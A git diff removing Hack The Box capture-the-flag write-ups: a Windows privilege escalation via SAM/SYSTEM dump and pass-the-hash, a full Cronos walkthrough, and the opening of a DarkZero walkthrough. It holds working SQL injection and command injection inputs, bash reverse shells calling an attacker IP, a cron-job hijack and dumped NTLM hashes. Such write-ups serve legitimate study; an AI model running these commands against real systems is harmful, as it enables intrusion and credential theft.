-/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir /Users/emily.oscars.CICADA/Desktop - - -   Directory: C:\Users\emily.oscars.CICADA\Desktop - - -Mode                 LastWriteTime         Length Name -----                 -------------         ------ ---- --ar---         5/31/2026  11:58 AM             34 user.txt - - -*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type /Users/emily.oscars.CICADA/Desktop/user.txt -e187e1d*************deff92 -``` - -And we got the user flag. - -Now for PrivEsc : - -```PowerShell -*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv - -PRIVILEGES INFORMATION ----------------------- - -Privilege Name                Description                    State -============================= ============================== ======= -SeBackupPrivilege             Back up files and directories  Enabled -SeRestorePrivilege            Restore files and directories  Enabled -SeShutdownPrivilege           Shut down the system           Enabled -SeChangeNotifyPrivilege       Bypass traverse checking       Enabled -SeIncreaseWorkingSetPrivilege Increase a process working set Enabled -``` - -So we got a `SeBackupPrivilege` and a `SeRestorePrivilege` as emily. - -```PowerShell -*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd C:\ProgramData -*Evil-WinRM* PS C:\ProgramData>reg save HKLM\SAM sam -The operation completed successfully. -*Evil-WinRM* PS C:\ProgramData>reg save HKLM\SYSTEM system -The operation completed successfully. -*Evil-WinRM* PS C:\ProgramData> download sam -  -                                         -Info: Downloading C:\ProgramData\sam to sam -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... - -*Evil-WinRM* PS C:\ProgramData> download system -                                         -Info: Downloading C:\ProgramData\system to system -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -                                         -Info: Download successful! -``` - -Then, we use impacket to get hashes : - -```bash ->  secretsdump.py -sam sam -system system LOCAL -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620 -[*] Dumping local SAM hashes (uid:rid:lmhash:nthash) -Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: -Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: -DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: -[*] Cleaning up... -``` - -And we got the administrator hash : - -`Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341` - -This is an LM:NT or NTLM hash. We can ignore the `aad3...` this is the default AP hash, outdated, completely useless, the real hash is `:2b87e7c93a3e8a0ea4a581937016f341`. - -```PowerShell ->  evil-winrm -i 10.129.231.149 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 - -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -*Evil-WinRM* PS C:\Users\Administrator\Documents> type /Users/Administrator/Desktop/root.txt -8b768*************8e7 -``` - -And we got the root flag. diff --git a/Cronos [MEDIUM].md b/Cronos [MEDIUM].md deleted file mode 100644 index 6e72a0b..0000000 --- a/Cronos [MEDIUM].md +++ /dev/null @@ -1,422 +0,0 @@ -Target : 10.129.4.148 - -Date : 28/05/2026 - -```bash ->  sudo echo "10.129.4.148 cronos.htb" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.4.148 cronos.htb ->  nmap -Pn -sV -sC -O -p- --min-rate=3000 10.129.4.148 -Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-28 12:32 +0200 -Nmap scan report for cronos.htb (10.129.4.148) -Host is up (0.080s latency). -Not shown: 65532 closed tcp ports (reset) -PORT   STATE SERVICE VERSION -22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) -| ssh-hostkey:   -|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) -|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) -|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) -53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux) -| dns-nsid:   -|_  bind.version: 9.10.3-P4-Ubuntu -80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu)) -|_http-title: Cronos -|_http-server-header: Apache/2.4.18 (Ubuntu) -Device type: general purpose -Running: Linux 3.X|4.X -OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 -OS details: Linux 3.10 - 4.11, Linux 3.13 - 4.4 -Network Distance: 2 hops -Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel - -OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -Nmap done: 1 IP address (1 host up) scanned in 48.43 seconds -``` - -We see three ports open : ssh `22/tcp`, `80/tcp` `Apache httpd 2.4.18` and DNS `53/tcp` with the version `ISC BIND 9.10.3-P4`. - -On the web application, we see documentation and github about the `laravel` VPS. - -```bash ->  curl -sI http://cronos.htb -HTTP/1.1 200 OK -Date: Thu, 28 May 2026 11:52:30 GMT -Server: Apache/2.4.18 (Ubuntu) -Cache-Control: no-cache, private -Set-Cookie: XSRF-TOKEN=eyJpdiI6ImUwcVB1TFQ4SHYzZkQwT1A2VDBpdEE9PSIsInZhbHVlIjoiU2dKRFlsMWo2VlJ5QXA2bzlYXC9pRUgySHlNODViRlRtS2YycHV5TTFzQ2R1VXJxSXRWSitQNVVmS2h6ajFDVGMyN3YwMWsreHM3V2J5cEhSRVRXeEtRPT0iLCJtYWMiOiI -xOTgyNmM4MGYyNjgxZGUwMTUyYzFhYjkzMWM3OTk2ODg0MDc1ZDhiOTAyYjYzZGNmNDk2Mzk0MmQyZTE1MmE1In0%3D; expires=Thu, 28-May-2026 13:52:30 GMT; Max-Age=7200; path=/ -Set-Cookie: laravel_session=eyJpdiI6IkpBVFwvVlhCRlBWRFFUVkx5dHlPVm5RPT0iLCJ2YWx1ZSI6IjF2RXlLcTJ5MVE5VTFOV0oxZmtqOWZcL1JnMU4yZ0NjWm1xV3ErSklaY2dJeXNzM3JWWURTM3czVDJRSkhmOHJsaHBKdExxVnNcL1M4WkdpUWRRWDkyZmc9PSIsIm -1hYyI6IjVkZmE0ZWJjMzY2YTcwMTI0MjRlNDM0MzAwOTQ3YzE3YjNkYTRhYTc2N2VmMjFlYTk1NzIzMThiZDA5NDk0NDUifQ%3D%3D; expires=Thu, 28-May-2026 13:52:30 GMT; Max-Age=7200; path=/; HttpOnly -Content-Type: text/html; charset=UTF-8 - ->  ffuf -u "http://cronos.htb/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -fc 404 - -       /'___\  /'___\           /___\         -      /\ \__/ /\ \__/  __  __  /\ \__/         -      \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\        -       \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/        -        \ \_\   \ \_\  \ \____/  \ \_\         -         \/_/    \/_/   \/___/    \/_/         - -      v2.1.0-dev -________________________________________________ - -:: Method           : GET -:: URL              : http://cronos.htb/FUZZ -:: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -:: Follow redirects : false -:: Calibration      : false -:: Timeout          : 10 -:: Threads          : 40 -:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500 -:: Filter           : Response status: 404 -________________________________________________ - -js                      [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 484ms] -css                     [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 4498ms] -server-status           [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 60ms] -:: Progress: [56162/56162] :: Job [1/1] :: 414 req/sec :: Duration: [0:02:18] :: Errors: 0 :: -``` - -We continue looking for domains : - -```bash ->  curl -s http://cronos.htb:80/robots.txt -User-agent: * -Disallow: - ->  ffuf -u "http://cronos.htb:80/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -fs 404 - -       /'___\  /'___\           /___\         -      /\ \__/ /\ \__/  __  __  /\ \__/         -      \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\        -       \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/        -        \ \_\   \ \_\  \ \____/  \ \_\         -         \/_/    \/_/   \/___/    \/_/         - -      v2.1.0-dev -________________________________________________ - -:: Method           : GET -:: URL              : http://cronos.htb:80/FUZZ -:: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -:: Follow redirects : false -:: Calibration      : false -:: Timeout          : 10 -:: Threads          : 40 -:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500 -:: Filter           : Response size: 404 -________________________________________________ - -index.php               [Status: 200, Size: 2319, Words: 990, Lines: 86, Duration: 140ms] -favicon.ico             [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 260ms] -.htaccess               [Status: 403, Size: 294, Words: 22, Lines: 12, Duration: 63ms] -web.config              [Status: 200, Size: 914, Words: 209, Lines: 24, Duration: 120ms] -robots.txt              [Status: 200, Size: 24, Words: 2, Lines: 3, Duration: 70ms] -.html                   [Status: 403, Size: 290, Words: 22, Lines: 12, Duration: 77ms] -.php                    [Status: 403, Size: 289, Words: 22, Lines: 12, Duration: 233ms] -.htpasswd               [Status: 403, Size: 294, Words: 22, Lines: 12, Duration: 92ms] -.htm                    [Status: 403, Size: 289, Words: 22, Lines: 12, Duration: 93ms] -.htpasswds              [Status: 403, Size: 295, Words: 22, Lines: 12, Duration: 101ms] -.htgroup                [Status: 403, Size: 293, Words: 22, Lines: 12, Duration: 82ms] -wp-forum.phps           [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 79ms] -.htaccess.bak           [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 78ms] -.htuser                 [Status: 403, Size: 292, Words: 22, Lines: 12, Duration: 68ms] -:: Progress: [10848/10848] :: Job [1/1] :: 526 req/sec :: Duration: [0:00:28] :: Errors: 0 :: - ->  curl -sL http://cronos.htb:80/web.config - -    -      -        -          -          -            -          -          -        -        -          -          -            -            -          -          -        -      -    - -``` - -Since `wp-forums.php` is `403` I doubt we can `curl` it but might as well try : - -```bash ->  curl -sS http://cronos.htb:80/wp-forums.phps - - -403 Forbidden - -

Forbidden

-

You don't have permission to access /wp-forums.phps -on this server.
-

-
-
Apache/2.4.18 (Ubuntu) Server at cronos.htb Port 80
- -``` - -And it's forbidden. - -We pivot to the `53/tcp` DNS port, to see if there are any misconfigurations : - -```bash ->  dig axfr @10.129.4.148 cronos.htb - - -; <<>> DiG 9.20.23 <<>> axfr @10.129.4.148 cronos.htb -; (1 server found) -;; global options: +cmd -cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 -cronos.htb.             604800  IN      NS      ns1.cronos.htb. -cronos.htb.             604800  IN      A       10.10.10.13 -admin.cronos.htb.       604800  IN      A       10.10.10.13 -ns1.cronos.htb.         604800  IN      A       10.10.10.13 -www.cronos.htb.         604800  IN      A       10.10.10.13 -cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 -;; Query time: 67 msec -;; SERVER: 10.129.4.148#53(10.129.4.148) (TCP) -;; WHEN: Thu May 28 14:10:20 CEST 2026 -;; XFR size: 7 records (messages 1, bytes 203) -``` - -We've got a bunch of subdomains. - -```bash ->  echo "10.129.4.148 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.4.148 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb - ->  curl -sI admin.cronos.htb -HTTP/1.1 200 OK -Date: Thu, 28 May 2026 12:12:33 GMT -Server: Apache/2.4.18 (Ubuntu) -Set-Cookie: PHPSESSID=qd3ha1s6s7j98663ebqs4l00l5; path=/ -Expires: Thu, 19 Nov 1981 08:52:00 GMT -Cache-Control: no-store, no-cache, must-revalidate -Pragma: no-cache -Content-Type: text/html; charset=UTF-8 -``` - -And we got a PHPSESSID from the `admin` subdomain. - -We go on the webpage, and we are greeted with a login page. - -We try an SQLi : `' OR 1=1 --`, `admin'--`, didn't work. -But we try `admin'#` and it works. - -We arrive at `http://admin.cronos.htb/welcome.php` where we get a traceroute. -We'll get it straight to our tun VPN IP with a listener on port 80 : - -```bash ->  sudo nc -lvnp 80 -Please touch the FIDO authenticator. -Listening on 0.0.0.0 80 -``` - -The listener receives nothing. We ping, the website says : - -We ping our tun VPN IP on the website and it says : -`PING 10.10.14.12 (10.10.14.12) 56(84) bytes of data. -`64 bytes from 10.10.14.12: icmp_seq=1 ttl=63 time=64.7 ms` -`1 packets transmitted, 1 received, 0% packet loss, time 0ms -`rtt min/avg/max/mdev = 64.712/64.712/64.712/0.000 ms` - -But the listener stays still. - -We traceroute to the machine's IP which is home (127.0.0.1) and ask for id with `127.0.0.1; id` and it gives us : `uid=33(www-data) gid=33(www-data) groups=33(www-data)` -`whoami` gives us `www-data` - -I'll stop the listener on port 80 and start listening on port 4444 : - -```bash ->  nc -lvnp 4444 - -Listening on 0.0.0.0 4444 -``` - -Then, on the web application, I'll use Remote Code Execution to bring - -```bash -127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.12/4444 0>&1' -``` - -``` -Connection received on 10.129.4.148 47184 -bash: cannot set terminal process group (1376): Inappropriate ioctl for device -bash: no job control in this shell -www-data@cronos:/var/www/admin$ whoami -``` -```bash -www-data@cronos:/var/www/admin$ find /home -name user.txt -find /home -name user.txt -/home/noulis/user.txt -www-data@cronos:/var/www/admin$ cd /home/noulis -cd /home/noulis -www-data@cronos:/home/noulis$ cat user.txt -cat user.txt -78e7*****************4cbe325 -``` - -Since its name is Cronos, we can infer that the privesc is about cronjobs. - -```bash -www-data@cronos:/var/www/admin$ cat /etc/crontab -cat /etc/crontab -# /etc/crontab: system-wide crontab -# Unlike any other crontab you don't have to run the `crontab' -# command to install the new version when you edit this file -# and files in /etc/cron.d. These files also have username fields, -# that none of the other crontabs do. - -SHELL=/bin/sh -PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin - -# m h dom mon dow user  command -17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly -25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) -47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) -52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) -* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 - -www-data@cronos:/var/www/admin$ ls -la /etc/cron* -ls -la /etc/cron* --rw-r--r-- 1 root root  797 Apr  9  2017 /etc/crontab - -/etc/cron.d: -total 24 -drwxr-xr-x  2 root root 4096 May 10  2022 . -drwxr-xr-x 95 root root 4096 Jun 17  2022 .. --rw-r--r--  1 root root  102 Apr  6  2016 .placeholder --rw-r--r--  1 root root  589 Jul 16  2014 mdadm --rw-r--r--  1 root root  670 Mar  1  2016 php --rw-r--r--  1 root root  191 Mar 22  2017 popularity-contest - -/etc/cron.daily: -total 60 -drwxr-xr-x  2 root root 4096 May 10  2022 . -drwxr-xr-x 95 root root 4096 Jun 17  2022 .. --rw-r--r--  1 root root  102 Apr  6  2016 .placeholder --rwxr-xr-x  1 root root  539 Apr  6  2016 apache2 --rwxr-xr-x  1 root root  376 Mar 31  2016 apport --rwxr-xr-x  1 root root 1474 Jan 17  2017 apt-compat --rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils --rwxr-xr-x  1 root root 1597 Nov 27  2015 dpkg --rwxr-xr-x  1 root root  372 May  6  2015 logrotate --rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db --rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm --rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate --rwxr-xr-x  1 root root  249 Nov 13  2015 passwd --rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest --rwxr-xr-x  1 root root  214 May 24  2016 update-notifier-common - -/etc/cron.hourly: -total 12 -drwxr-xr-x  2 root root 4096 May 10  2022 . -drwxr-xr-x 95 root root 4096 Jun 17  2022 .. --rw-r--r--  1 root root  102 Apr  6  2016 .placeholder - -/etc/cron.monthly: -total 12 -drwxr-xr-x  2 root root 4096 May 10  2022 . -drwxr-xr-x 95 root root 4096 Jun 17  2022 .. --rw-r--r--  1 root root  102 Apr  6  2016 .placeholder - -/etc/cron.weekly: -total 24 -drwxr-xr-x  2 root root 4096 May 10  2022 . -drwxr-xr-x 95 root root 4096 Jun 17  2022 .. --rw-r--r--  1 root root  102 Apr  6  2016 .placeholder --rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim --rwxr-xr-x  1 root root  771 Nov  6  2015 man-db --rwxr-xr-x  1 root root  211 May 24  2016 update-notifier-common -``` - -Since `cronos.htb` was all about the `laravel` github and VPS, we will target it : - -```bash -www-data@cronos:/var/www/admin$ ls -la /var/www/laravel/artisan -ls -la /var/www/laravel/artisan --rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan -www-data@cronos:/var/www/admin$ file /var/www/laravel/artisan -file /var/www/laravel/artisan -/var/www/laravel/artisan: a /usr/bin/env php script, ASCII text executable -``` - -We see we have a `/usr/bin/env` php script. - -I open a `python http.server` : - -```bash ->  python3 -m http.server 8000 - -Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... -``` - -We create a `shell.php` script : - -```bash -cat > /tmp/shell.php << 'EOF' - -& /dev/tcp/10.10.14.12/4444 0>&1'"); - -?> - -EOF -``` - -Then, we transfer it on the target : - -```bash -www-data@cronos:/$ cp /tmp/shell.php /var/www/laravel/artisan -cp /tmp/shell.php /var/www/laravel/artisan -``` - -We open a listener : - -```bash ->  nc -lvnp 4444 -Listening on 0.0.0.0 4444 -``` - -Verify the frequency of cronjobs : - -```bash -grep -v '^#' /etc/crontab | grep -v '^$' -SHELL=/bin/sh -PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin -17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly -25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) -47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) -52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) -* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 -``` - -After awhile, we receive the reverse shell through the cronjob executing the php script : - -```bash ->  nc -lvnp 4444 -Listening on 0.0.0.0 4444 -Connection received on 10.129.4.148 47212 -bash: cannot set terminal process group (4074): Inappropriate ioctl for device -bash: no job control in this shell -root@cronos:~# cat /root/root.txt -cat /root/root.txt -5003f0***********ee0d9c3 -``` - -And we get the root flag ! diff --git a/DarkZero [HARD].md b/DarkZero [HARD].md deleted file mode 100644 index 5677b68..0000000 --- a/DarkZero [HARD].md +++ /dev/null @@ -1,1013 +0,0 @@ - -Target : 10.129.20.10 / 10.129.20.89 - -Date : 23/06/2026 - -`"As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!"` - -We start by testing the credentials while the `nmap scan` is ongoing : - -```bash ->  nxc smb 10.129.20.10 -u john.w -p 'RFulUtONCOL!' --shares -SMB         10.129.20.10    445    DC01             [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.20.10    445    DC01             [+] darkzero.htb\john.w:RFulUtONCOL!   -SMB         10.129.20.10    445    DC01             [*] Enumerated shares -SMB         10.129.20.10    445    DC01             Share           Permissions     Remark -SMB         10.129.20.10    445    DC01             -----           -----------     ------ -SMB         10.129.20.10    445    DC01             ADMIN$                          Remote Admin -SMB         10.129.20.10    445    DC01             C$                              Default share -SMB         10.129.20.10    445    DC01             IPC$            READ            Remote IPC -SMB         10.129.20.10    445    DC01             NETLOGON        READ            Logon server share   -SMB         10.129.20.10    445    DC01             SYSVOL          READ            Logon server share -``` - -```bash ->  nmap -sC -sV -O -Pn -p- --min-rate=3000 -T4 10.129.20.10 -Please touch the FIDO authenticator. -Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 12:17 +0200 -Nmap scan report for darkzero.htb (10.129.20.10) -Host is up (0.074s latency). -Not shown: 65517 filtered tcp ports (no-response) -PORT      STATE SERVICE       VERSION -53/tcp    open  domain        Simple DNS Plus -88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-23 10:18:16Z) -135/tcp   open  msrpc         Microsoft Windows RPC -139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn -389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name) -|_ssl-date: TLS randomness does not represent time -| ssl-cert: Subject: commonName=DC01.darkzero.htb -| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.darkzero.htb -| Not valid before: 2026-06-23T10:00:26 -|_Not valid after:  2027-06-23T10:00:26 -445/tcp   open  microsoft-ds? -464/tcp   open  kpasswd5? -636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name) -|_ssl-date: TLS randomness does not represent time -| ssl-cert: Subject: commonName=DC01.darkzero.htb -| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.darkzero.htb -| Not valid before: 2026-06-23T10:00:26 -|_Not valid after:  2027-06-23T10:00:26 -1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM -|_ssl-date: 2026-06-23T10:19:59+00:00; -3s from scanner time. -| ms-sql-ntlm-info:   -|   10.129.20.10:1433:   -|     Target_Name: darkzero -|     NetBIOS_Domain_Name: darkzero -|     NetBIOS_Computer_Name: DC01 -|     DNS_Domain_Name: darkzero.htb -|     DNS_Computer_Name: DC01.darkzero.htb -|     DNS_Tree_Name: darkzero.htb -|_    Product_Version: 10.0.26100 -| ms-sql-info:   -|   10.129.20.10:1433:   -|     Version:   -|       name: Microsoft SQL Server 2022 RTM -|       number: 16.00.1000.00 -|       Product: Microsoft SQL Server 2022 -|       Service pack level: RTM -|       Post-SP patches applied: false -|_    TCP port: 1433 -| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback -| Not valid before: 2026-06-23T10:11:50 -|_Not valid after:  2056-06-23T10:11:50 -2179/tcp  open  vmrdp? -3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name) -|_ssl-date: TLS randomness does not represent time -| ssl-cert: Subject: commonName=DC01.darkzero.htb -| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.darkzero.htb -| Not valid before: 2026-06-23T10:00:26 -|_Not valid after:  2027-06-23T10:00:26 -5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) -|_http-server-header: Microsoft-HTTPAPI/2.0 -|_http-title: Not Found -49672/tcp open  msrpc         Microsoft Windows RPC -49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 -49893/tcp open  msrpc         Microsoft Windows RPC -49926/tcp open  msrpc         Microsoft Windows RPC -57966/tcp open  msrpc         Microsoft Windows RPC -63868/tcp open  msrpc         Microsoft Windows RPC -Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port -Device type: general purpose -Running (JUST GUESSING): Microsoft Windows 2022 (87%) -OS CPE: cpe:/o:microsoft:windows_server_2022 -Aggressive OS guesses: Microsoft Windows Server 2022 (87%) -No exact OS matches for host (test conditions non-ideal). -Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows - -Host script results: -|_clock-skew: mean: -3s, 